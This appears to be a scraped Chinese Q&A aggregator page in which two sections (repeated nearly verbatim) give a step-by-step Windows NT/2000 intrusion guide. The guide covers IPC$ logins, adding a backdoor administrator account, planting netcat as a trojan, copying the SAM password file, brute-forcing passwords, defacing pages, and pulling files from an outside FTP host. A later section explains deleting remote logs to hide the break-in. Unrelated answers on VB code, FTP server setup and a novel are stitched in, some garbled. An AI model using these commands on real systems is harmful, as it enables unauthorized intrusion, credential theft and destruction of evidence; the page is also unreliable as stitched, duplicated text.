A. 怎樣在網上進入別人的操作系統。
如何進入別人的電腦- -
大學時在參加ACCP的電腦編程課程,只是興趣而已,並沒有多麼的用心學,對一些亂七八糟的東西比較感興趣,那時做的最多的就是嘗試進入別人的電腦和伺服器........
1、取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。
2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。
3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第一行是對方電腦名稱 第二行是對方電腦所在工作組 第三行是對方電腦的說明
4.在Windows目錄下有一文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名
5.開DOS窗口鍵入 NBTSTAT -R 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入
黑客命令之1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為
127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的*作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用
戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這
里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?
不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,
其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
黑客命令之2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?
那麼需要用AT命令,這里假設你已經登陸了那個伺服器。
你首先要得到對方的時間,
net time \\127.0.0.1
將會返回一個時間,這里假設時間為12:1,現在需要新建一個作業,其ID=1
at \\127.0.0.1 12:3 nc.exe
這里假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上.
這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它
是一個TELNET服務,埠為99.
等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬.
黑客命令之3:telnet
這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用
戶,不過你給對方種了木馬,直接連到這個木馬打開的埠.
telnet 127.0.0.1 99
這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也
就是肉雞.
黑客命令之4:FTP
它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空
間,國內多的是,如果真的找不到,我給個http://www.51.NET,
不錯的.當我們申請完後,它會給用戶名,密碼,以及FTP伺服器
在上傳前需要登陸先,這里我們假設FTP伺服器是 H, ttp://www.51.NET
用戶名是HUCJS,密碼是654321
ftp http://www.51.net/
他會要求輸入用戶,成功後會要求輸入密碼.----------------------
下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:\index.htm d:\
黑客命令之5:
下面我說說怎樣把本地的文件復制到對方硬碟上去,需要建立好IPC$連接才有效。
這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下
index.htm \\127.0.0.1\c$\index.htm ----------------------
如果你要復制到D盤下把C改為D,就行了!
index.htm \\127.0.0.1\d$\index.htm ----------------------
如果你要把他復制到WINNT目錄里
就要把輸入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt ----------------------
要把對方的文件復制過來,順便告訴大家NT的備份的資料庫放在
x:\winnt\repair\sam._ sam._是資料庫的文件名
下面就把127.0.0.1的資料庫復制到本地C盤下
\\127.0.0.1\admin$\repair\sam._ c:\
黑客命令之7:nbtstat
如果你掃到一部NT的機子,他的136到139其中一個埠開了的話,就
要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後
就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都
試下,不行就暴力破解吧!
現在網上很多NT的機子都開了這些埠的,你可以練習下,我們來分
析得到的結果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫。
下面是得到的結果。
NetBIOS Remote Machine Name Table
Name 無效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是
不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用
戶。
這里的用戶是PENTIUMII。
黑客命令之8:Shutdown
關了對方的NT伺服器的命令
Shutdown \\IP地址 t:20
20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大
的損失,要做個有良心的入侵者呀。
黑客命令之10:echo
著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主
機。
我們假設我們要把「南京大屠殺鐵證如山,任何日本人不得抵賴!」
寫入index.htm,有2種方法,大家看看有什麼區別。
echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>index.htm
echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>>index.htm
第一個的意思是覆蓋index.htm原有的內容,把「南京大屠殺鐵證如
山,任何日本人不得抵賴!」寫進index.htm。
第二個的意思是把「南京大屠殺鐵證如山,任何日本人不得抵賴!」
加到index.htm裡面。
「>>」產生的內容將追加進文件中,「>」則將原文件內容覆蓋。
大家可以本地試下。
可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載主頁
到對方的目錄里。
1、首先,我們需要申請一個免費的主頁空間。
2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren伺服器
為例。)
open upload.chinaren.com(你的FTP伺服器,申請時你的空間提供商
會給你的)
cnhack(你申請時的用戶名)
test(你申請時的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上
的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數,執行文件里的
內容。)
等命令完成時,文件已經下載到你指定的文件里了。
注意:取得文件後,請刪除cnhack.txt。(如果不刪除,很容易會給
別人看到你的密碼。)
記得要 del c:\cnhack.txt
黑客命令之11:attrib
這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件
屬性設置了只讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不
行。倒!不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的只讀屬性去掉。
如果把「-」改為「+」則是把這個文件的屬性設置為只讀 ----------------------
attrib +r index.htm
這個命令是把index.htm的屬性設置為只讀。
黑客命令之12:del
當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日
志,當然要刪除日誌啦!想被捉嗎。呵呵。
NT的日誌有這些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改
成其他盤。
B. vb的webbroswer控制項怎麼打開本地的.url文件
請看下面的代碼:
'程序調用方法
'WebBrowser1.NavigateGetURL(快捷方式路徑)
'取得URL里鏈接的函數
PublicFunctionGetURL(ByValurlPathAsString)AsString
DimFileNumAsInteger
DimIdAsString
DimTemAsString
行侍Id="[InternetShortcut]"'在URL文件中,這是一個標識,在這一句下面就是URL地址
FileNum=FreeFile()
OpenurlPathForInputAs#FileNum
LineInput#FileNum,Tem
IfTem=IdThen'得到標識
LineInput#FileNum,Tem'再讀入的一行就是地址
GetURL=Right(Tem,Len(Tem)-4)'把地址頭部的URL=去掉,即去掉4個字
Close#FileNum
搜大ExitFunction'退出函數
EndIf
Close#FileNum
'如果沒有得到地世帶豎址,這里指定一個默認的
GetURL="about:blank"
EndFunction
C. 怎樣擁有FTP伺服器地址
Serv-U FTP Server,是一種被廣泛運用的FTP伺服器端軟體,支持3x/9x/ME/NT/2K等全Windows系列。可以設定多個FTP伺服器、限定登錄用戶的許可權、登錄主目錄及空間大小等,功能非常完備。 它具有非常完備的安全特性,支持SSl FTP傳輸,支持在多個Serv-U和FTP客戶端通過SSL加密連接保護您的數據安全等
1. 下載安裝Serv-U FTP Server
安裝原版軟體和漢化補丁,這個過程就不多說了,想必沒人不會的。
2. 建立第一個本地FTP伺服器
安裝完成後程序會自動運行,你也可以在菜單中選擇運行。
1、 第一次運行程序,它會彈出設置向導窗口將會帶你完成最初的設置
2、 單擊"下一步",出現"顯示菜單圖像"的窗口,問你是否在菜單中顯示小圖像,看個人喜歡了
3、 單擊"下一步",這個窗口是讓你在本地第一次運行FTP伺服器,只要"下一步"就行了
4、 接下來要你輸入你的IP地址。如果你自己有伺服器,有固定的IP,那就請輸入IP地址,如果你只是在自己電腦上建立FTP,而且又是撥號用戶,有的只是動態IP,沒有固定IP,那這一步就省了,什麼也不要填,Serv-U 會自動確定你的IP地址,"下一步"
5、 在這兒要你輸入你的域名。如果你有的話,如:ftp.abc. com ,沒有的話,就隨便填一個
6、 "下一步",詢問你是否允許匿名訪問一般說來,匿名訪問是以Anonymous為用戶名稱登錄的,無需密碼,當然如果你想成立一個會員區什麼的,就應該選擇"否",不讓隨便什麼人都可以登錄,只有許可用戶才行,在此我們填"是";
7、 "下一步",問你匿名用戶登錄到你的電腦時的目錄。你可以自己指定一個硬碟上已存在的目錄,如F:\temp\xyz;
8、 "下一步",詢問你是否要鎖定該目錄,鎖定後,匿名登錄的用戶將只能認為你所指定的目錄(F:\temp\xyz)是根目錄,也就是說他只能訪問這個目錄下的文件和文件夾,這個目錄之外就不能訪問,對於匿名用戶一般填"是"
9、 "下一步",詢問你是否創建命名的帳號,也就是說可以指定用戶以特定的帳號訪問你的FTP,這對於辦會員區可很有用哦,你可以對於每個人都創建一個帳號,每個帳號的許可權不同,就可以不同程序地限制每個人的權利,方法將在後面講到,這里選擇"是"
10、 "下一步",請你填入所要建立的帳號的名稱,如:ldr,
11、 "下一步",請輸入密碼,如:123
12、 "下一步",詢問登錄目錄是什麼,這一步與第7步一樣,如:F:\tem
13、 "下一步",詢問你是否要鎖定該目錄,同第8步,這里選擇"否"
14、 接下來詢問你這次創建的用戶的管理員許可權,有幾項選擇:無許可權,組管理員,域管理員,只讀管理員和系統管理員,每項的許可權各不相同;這里選擇"系統管理員";
15、 最後一步,點擊"完成"就OK了,你有什麼需要修改的,可以點"上一步",或者進入Serv-U管理員直接修改。
至此,我們建立了一個域ftp.abc. com ,兩個用戶,一個Anonymous,一個ldr。
來源:http://ke.haosou.com/doc/5500892-5738035.html
D. mobaxtem上傳文件只能一個
mobaxtem上傳文件只能一個是因為:比較之前可以上傳圖像的文件,和無法上傳圖肢差沖像的文件,可以上傳圖像的歷殲這個文件,之前配置過sftp,伺服器可慶拍以和本地互通。
E. 只知道電腦IP,怎麼進他電腦(高手進)
1、取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。
2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。
3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第一行是對方電腦名稱 第二行是對方電腦所在工作組 第三行是對方電腦的說明
4.在Windows目錄下有一文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名
5.開DOS窗口鍵入 NBTSTAT -R 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入
黑客命令之1:NET
只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧!
這里我們好稿假如你得到的用戶是hbx,密碼是123456。假設對方IP為
127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127.0.0.1\ipc$ /delte
下面的*作你必須登陸後才可以用.登陸的方法就在上面.
----------------------
下面我們講怎麼創建一個用戶,由於SA的許可權相當於系統的超級用
戶.
我們加一個hei的用戶密碼為lovechina
net user hei lovechina /add
只要顯示命令成功,那麼我們可以把他加入Administrator組了.
net localgroup Administrators hei /add
----------------------
這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這
里把對方的C盤映射到本地的Z盤.
net use z:\\127.0.0.1\c$
----------------------
net start telnet
這樣可以打開對方的TELNET服務.
----------------------
這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?
不知道是否這樣,我的2000就是刪除不了它。
net user guest /active:yes
----------------------
這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,
其他用戶也可以的。只要有許可權就行了呀!
net user guest lovechina
黑客命令之2:at
一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?
那麼需要用AT命令,這里假設你已經登陸了那個伺服器。
你首先要得到對方的時間,
net time \\127.0.0.1
將會返回一個時間,這禪襪敏里假設時間為12:1,現在需要新建一個作業,其ID=1
at \\127.0.0.1 12:3 nc.exe
這里假設了一個木馬,名為NC.EXE,這個東西要在對方伺服器上.
這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它
是一個TELNET服務,埠為99.
等到了12:3就可以連接到對方的99埠.這樣就給對方種下了木馬.
黑客命令之3:telnet
這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用
戶,不過你給對方種了木馬,直接連到這個木馬打開的埠.
telnet 127.0.0.1 99
這樣就可以連到對方的99埠.那你就可以在對方運行命令了,這個也
就是肉雞.
黑客命令之4:FTP
它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空
間,國內多的是,如果真的找不到,我給個http://www.51.NET,
不錯的.當我們申請完後,它會賀枝給用戶名,密碼,以及FTP伺服器
在上傳前需要登陸先,這里我們假設FTP伺服器是 H, ttp://www.51.NET
用戶名是HUCJS,密碼是654321
ftp www.51.net
他會要求輸入用戶,成功後會要求輸入密碼.----------------------
下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:\下,傳到對方D:\
get c:\index.htm d:\
假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下
put c:\index.htm d:\
黑客命令之5:
下面我說說怎樣把本地的文件復制到對方硬碟上去,需要建立好IPC$連接才有效。
這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下
index.htm \\127.0.0.1\c$\index.htm ----------------------
如果你要復制到D盤下把C改為D,就行了!
index.htm \\127.0.0.1\d$\index.htm ----------------------
如果你要把他復制到WINNT目錄里
就要把輸入
index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt ----------------------
要把對方的文件復制過來,順便告訴大家NT的備份的資料庫放在
x:\winnt\repair\sam._ sam._是資料庫的文件名
下面就把127.0.0.1的資料庫復制到本地C盤下
\\127.0.0.1\admin$\repair\sam._ c:\
黑客命令之7:nbtstat
如果你掃到一部NT的機子,他的136到139其中一個埠開了的話,就
要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後
就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都
試下,不行就暴力破解吧!
現在網上很多NT的機子都開了這些埠的,你可以練習下,我們來分
析得到的結果。
命令是
nbtstat -A XX.XX.XX.XX
-A一定要大寫。
下面是得到的結果。
NetBIOS Remote Machine Name Table
Name 無效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉紅色的就是登陸過這部系統的用戶,可能你不知道怎麼看,大家是
不是看到了一竄數字,只要這竄數字是<03>的話,那他前面的就是用
戶。
這里的用戶是PENTIUMII。
黑客命令之8:Shutdown
關了對方的NT伺服器的命令
Shutdown \\IP地址 t:20
20秒後將NT自動關閉,三思後才能運行這個命令,這樣對對方造很大
的損失,要做個有良心的入侵者呀。
黑客命令之10:echo
著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主
機。
我們假設我們要把「南京大屠殺鐵證如山,任何日本人不得抵賴!」
寫入index.htm,有2種方法,大家看看有什麼區別。
echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>index.htm
echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>>index.htm
第一個的意思是覆蓋index.htm原有的內容,把「南京大屠殺鐵證如
山,任何日本人不得抵賴!」寫進index.htm。
第二個的意思是把「南京大屠殺鐵證如山,任何日本人不得抵賴!」
加到index.htm裡面。
「>>」產生的內容將追加進文件中,「>」則將原文件內容覆蓋。
大家可以本地試下。
可能你會問,這樣簡單黑下有什麼好玩的,其實他可以用來下載主頁
到對方的目錄里。
1、首先,我們需要申請一個免費的主頁空間。
2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren伺服器
為例。)
open upload.chinaren.com(你的FTP伺服器,申請時你的空間提供商
會給你的)
cnhack(你申請時的用戶名)
test(你申請時的密碼)
get index.htm c:\inetpub\wwwroot\index.htm(這里是把你空間上
的index.htm下載到對方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS)
具體的做法:
輸入 echo open upload.chinaren.com> c:\cnhack.txt
輸入 echo cnhack >> c:\cnhack.txt
輸入 echo 39abs >> c:\cnhack.txt
輸入 echo get index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最後輸入 ftp -s:c:\cnhack.txt (利用ftp的-s參數,執行文件里的
內容。)
等命令完成時,文件已經下載到你指定的文件里了。
注意:取得文件後,請刪除cnhack.txt。(如果不刪除,很容易會給
別人看到你的密碼。)
記得要 del c:\cnhack.txt
黑客命令之11:attrib
這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件
屬性設置了只讀,那就很可憐呀,想刪除他也不行,想覆蓋他也不
行。倒!不過有這個命令就別怕了。
attrib -r index.htm
這個命令是把index.htm的只讀屬性去掉。
如果把「-」改為「+」則是把這個文件的屬性設置為只讀 ----------------------
attrib +r index.htm
這個命令是把index.htm的屬性設置為只讀。
黑客命令之12:del
當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日
志,當然要刪除日誌啦!想被捉嗎。呵呵。
NT的日誌有這些
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改
成其他盤。
F. 求重生之溺殺txt 謝謝
鏈接:
簡介:恨一個人,那就寵他,將他寵得無判銀晌法無天,這樣,你便可以掘鋒干搏升干凈凈地站在一邊,笑看他自我毀滅。愛一個人,那就寵他,用寵愛折斷他的翅膀。。
G. Windows2000日誌文件默認位置
日誌文件默認位置: 應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置:%sys temroot%\sys tem32\config,默認文件大小512KB,管理員都會改變這個默認大小。 安全日誌文件:%sys temroot%\sys tem32\config\SecEvent.EVT 系統日誌文件:%sys temroot%\sys tem32\config\SysEvent.EVT 應用程碧脊序日誌文件:%sys temroot%\sys tem32\config\AppEvent.EVT Internet信息服務FTP日誌默認位置:%sys temroot%\sys tem32\logfiles\msftpsvc1\,默認每天一個日誌 Internet信息服務WWW日誌默認位置:%sys temroot%\sys tem32\logfiles\w3svc1\,默認每天一個日誌 Scheler服務日誌默認位置:%sys temroot%\schedlgu.txt 以上日誌在注冊表裡的鍵: 應用程序日誌,安全日誌,系統日誌,DNS伺服器日誌,它們這些LOG文件在注冊表中的: HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog 有的管理員很可能將這些日誌重定位。其中EVENTLOG下面有很多的子表,裡面可查到以上日誌的定位目錄。 Schedluler服務日誌在注冊表中 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchelingAgent FTP和WWW日誌詳解: FTP日誌和WWW日誌默認情況,每天生成一個日誌文件,包含了該日的一切記錄,文件名通常為ex(年份)(月份)(日期),例如ex001023,就是2000年10月23日產生的日誌,用記事本就可直接打開,如下例: #Software: Microsoft Internet Information Services 5.0 (微軟IIS5.0) #Version: 1.0 (版本1.0) #Date: 20001023 0315 (服務啟動時間日期) #Fields: time cip csmethod csuristem scstatus 0315 127.0.0.1 [1]USER administator 331 (IP地址為127.0.0.1用戶名為administator試圖登錄) 0318 127.0.0.1 [1]PASS – 530 (登錄失敗) 032:04 127.0.0.1 [1]USER nt 331 (IP地址為127.0.0.1用戶名為nt的用戶試圖登錄) 032:06 127.0.0.1 [1]PASS – 530 (登錄失敗) 032:09 127.0.0.1 [1]USER cyz 331 (IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄)陸螞 0322 127.0.0.1 [1]PASS – 530 (登錄失敗) 0322 127.0.0.1 [1]USER administrator 331 (IP地址為127.0.0.1用戶名為administrator試圖登錄) 0324 127.0.0.1 [1]PASS – 230 (登錄成功) 0321 127.0.0.1 [1]MKD nt 550 (新建目錄失敗) 0325 127.0.0.1 [1]QUIT – 550 (退出FTP程序) 從日誌里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統,換了四次用戶名和密碼才成功,管理員立即就可以得知管理員的入侵時間、IP地址以及探測的用戶名,如上例入侵者最終是用administrator用戶名進入的,那麼就要考慮更換此用戶名的密碼,或者重命名administrator用戶。 WWW日誌 WWW服務同FTP服務一樣,產生的日誌悔悉滲也是在%sys temroot%\sys tem32\LogFiles\W3SVC1目錄下,默認是每天一個日誌文件,下面是一個典型的WWW日誌文件 #Software: Microsoft Internet Information Services 5.0 #Version: 1.0 #Date: 20001023 03:091 #Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent) 20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) 通過分析第六行,可以看出2000年10月23日,IP地址為192.168.1.26的用戶通過訪問IP地址為192.168.1.37機器的80埠,查看了一個頁面iisstart.asp 這位用戶的瀏覽器為compatible;+MSIE+5.0;+Windows+98+DigExt,有經驗的管理員就可通過安全日誌、FTP日誌和WWW日誌來確定入侵者的IP地址以及入侵時間。 既使你刪掉FTP和WWW日誌,但是還是會在系統日誌和安全日誌里記錄下來,但是較好的是只顯示了你的機器名,並沒有你的IP,例如上面幾個探測之後,系統日誌 將會產生下面的記錄: 一眼就能看出2000年10月23日,16點17分,系統因為某些事件出現警告,雙擊頭一個,打開它的屬性: 屬性里記錄了出現警告的原因,是因為有人試圖用administator用戶名登錄,出現一個錯誤,來源是FTP服務。 同時安全記錄里寫將同時記下:(Ekin:此圖不是此次示例的安全日誌) 在上圖中可以看到兩種圖標:鑰匙(表示成功)和鎖(表示當用戶在做什麼時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄、注銷失敗,日期為2000年10月18日,時間為1002,這就需要重點觀察。 雙點第一個失敗審核事件的,即得到此事件的詳細描述,如下圖12所示: 分析上圖,我們可以得知有個CYZ的工作站,用administator用戶名登錄本機,但是因為用戶名未知或密碼錯誤(實際為密碼錯誤)未能成功。 另外還有DNS伺服器日誌,不太重要,就此略過(其實是我沒有看過它) 知道了Windows2000日誌的詳細情況,下面就要學會怎樣刪除這些日誌: 通過上面,得知日誌文件通常有某項服務在後台保護,除了系統日誌、安全日誌、應用程序日誌等等,它們的服務是Windos2000的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動後,啟動服務來保護這些文件,所以很難刪除,而FTP日誌和WWW日誌以及Scedlgu日誌都是可以輕易地刪除的。 首先要取得Admnistrator密碼或Administrators組成員之一,然後Telnet到遠程主機,先來試著刪除FTP日誌: D:\SERVER>del schedlgu.txt D:\SERVER\SchedLgU.Txt 進程無法訪問文件,因為另一個程序正在使用此文件。 說過了,後台有服務保護,先把服務停掉! D:\SERVER>net stop "task scheler" 下面的服務依賴於 Task Scheler 服務。 停止Task Scheler 服務也會停止這些服務。 Remote Storage Engine 是否繼續此操作? (Y/N) [N]: y Remote Storage Engine 服務正在停止.... Remote Storage Engine 服務已成功停止。 Task Scheler 服務正在停止. Task Scheler 服務已成功停止。 OK,它的服務停掉了,同時也停掉了與它有依賴關系的服務。再來試著刪一下! D:\SERVER>del schedlgu.txt D:\SERVER> 沒有反應?成功了!下一個是FTP日誌和WWW日誌,原理都是一樣,先停掉相關服務,然後再刪日誌! D:\SERVER\sys tem32\LogFiles\MSFTPSVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\MSFTPSVC1> 以上操作成功刪除FTP日誌!再來WWW日誌! D:\SERVER\sys tem32\LogFiles\W3SVC1>del ex*.log D:\SERVER\sys tem32\LogFiles\W3SVC1> OK!恭喜,現在簡單的日誌都已成功刪除。下面就是很難的安全日誌和系統日誌了,守護這些日誌的服務是Event Log,試著停掉它! D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog 這項服務無法接受請求的 "暫停" 或 "停止" 操作。 KAO,I 服了 U,沒辦法,它是關鍵服務。如果不用第三方工具,在命令行上根本沒有刪除安全日誌和系統日誌的可能!所以還是得用雖然簡單但是速度慢得死機的辦法:打開「控制面板」的「管理工具」中的「事件查看器」(98沒有,知道用Win2k的好處了吧),在菜單的「操作」項有一個名為「連接到另一台計算機」的菜單,點擊它如下圖所示: 輸入遠程計算機的IP,然後點支煙,等上數十分鍾,忍受象死機的折磨,然後打開下圖: 選擇遠程計算機的安全性日誌,右鍵選擇它的屬性: 點擊屬性里的「清除日誌」按鈕,OK!安全日誌清除完畢!同樣的忍受痛苦去清除系統日誌! 目前在不藉助第三工具的情況下,能很快,很順利地清除FTP、WWW還有Schedlgu日誌,就是系統日誌和安全日誌屬於Windows2000的嚴密守護,只能用本地的事件查看器來打開它,因為在圖形界面下,加之網速又慢,如果你銀子多,時間閑,還是可以清除它的。綜上所述,介紹了Windows2000的日誌文件以及刪除方法,但是你必須是Administrator,注意必須作為管理員或管理組的成員登錄才能打開安全日誌記錄。該過程適用於 Windows 2000 Professional 計算機,也適用於作為獨立伺服器或成員伺服器運行的 Windows 2000 Server 計算機。 至此,Windows2000安全知識基礎講座完畢,還有幾句話要講,大家也看出來了,雖然FTP等等日誌可以很快清除,但是系統日誌和安全日誌卻不是那麼快、那麼順利地能刪除,如果遇到聰明的管理員,將日誌文件轉移到另一個地方,那更是難上加難,所以奉勸大家,千萬不要拿國內的主機做試驗,國內的法律很嚴呀!今天吃飯時,聽說有兩個人開玩笑,一個人把另外一個人的東西藏起來了,結果那個人一急,報案了,於是藏東西那個人被判四年刑!!法官說法律是不開玩笑的!!!所以大家一定要牢記這點!(不要說我老生常談) 如果大家有什麼不明白地方,請在光和影子論壇提問!謝謝! 在上圖中可以看到兩種圖標:鑰匙(表示成功)和鎖(表示當用戶在做什麼時被系統停止)。接連四個鎖圖標,表示四次失敗審核,事件類型是帳戶登錄和登錄、注銷失敗,日期為2000年10月18日,時間為1002,這就需要重點觀察。 雙點第一個失敗審核事件的,即得到此事件的詳細描述,如下圖12所示: 分析上圖,我們可以得知有個CYZ的工作站,用administator用戶名登錄本機,但是因為用戶名未知或密碼錯誤(實際為密碼錯誤)未能成功。 另外還有DNS伺服器日誌,不太重要,就此略過(其實是我沒有看過它) 知道了Windows2000日誌的詳細情況,下面就要學會怎樣刪除這些日誌: 通過上面,得知日誌文件通常有某項服務在後台保護,除了系統日誌、安全日誌、應用程序日誌等等,它們的服務是Windos2000的關鍵進程,而且與注冊表文件在一塊,當Windows2000啟動後,啟動服務來保護這些文件,所以很難刪除,而FTP日誌和WWW日誌以及Scedlgu日誌都是可以輕易地刪除的。 首先要取得Admnistrator密碼或Administrators組成員之一,然後Telnet到遠程主機,先來試著刪除FTP日誌: D:\SERVER>del schedlgu.txt D:\SERVER\SchedLgU.Txt 進程無法訪問文件,因為另一個程序正在使用此文件。 說過了,後台有服務保護,先把服務停掉! D:\SERVER>net stop "task scheler" 下面的服務依賴於 Task Scheler 服務。 停止Task Scheler 服務也會停止這些服務。 Remote Storage Engine 是否繼續此操作? (Y/N) [N]: y Remote Storage Engine 服務正在停止.... Remote Storage Engine 服務已成功停止。 Task Scheler 服務正在停止. Task Scheler 服務已成功停止。 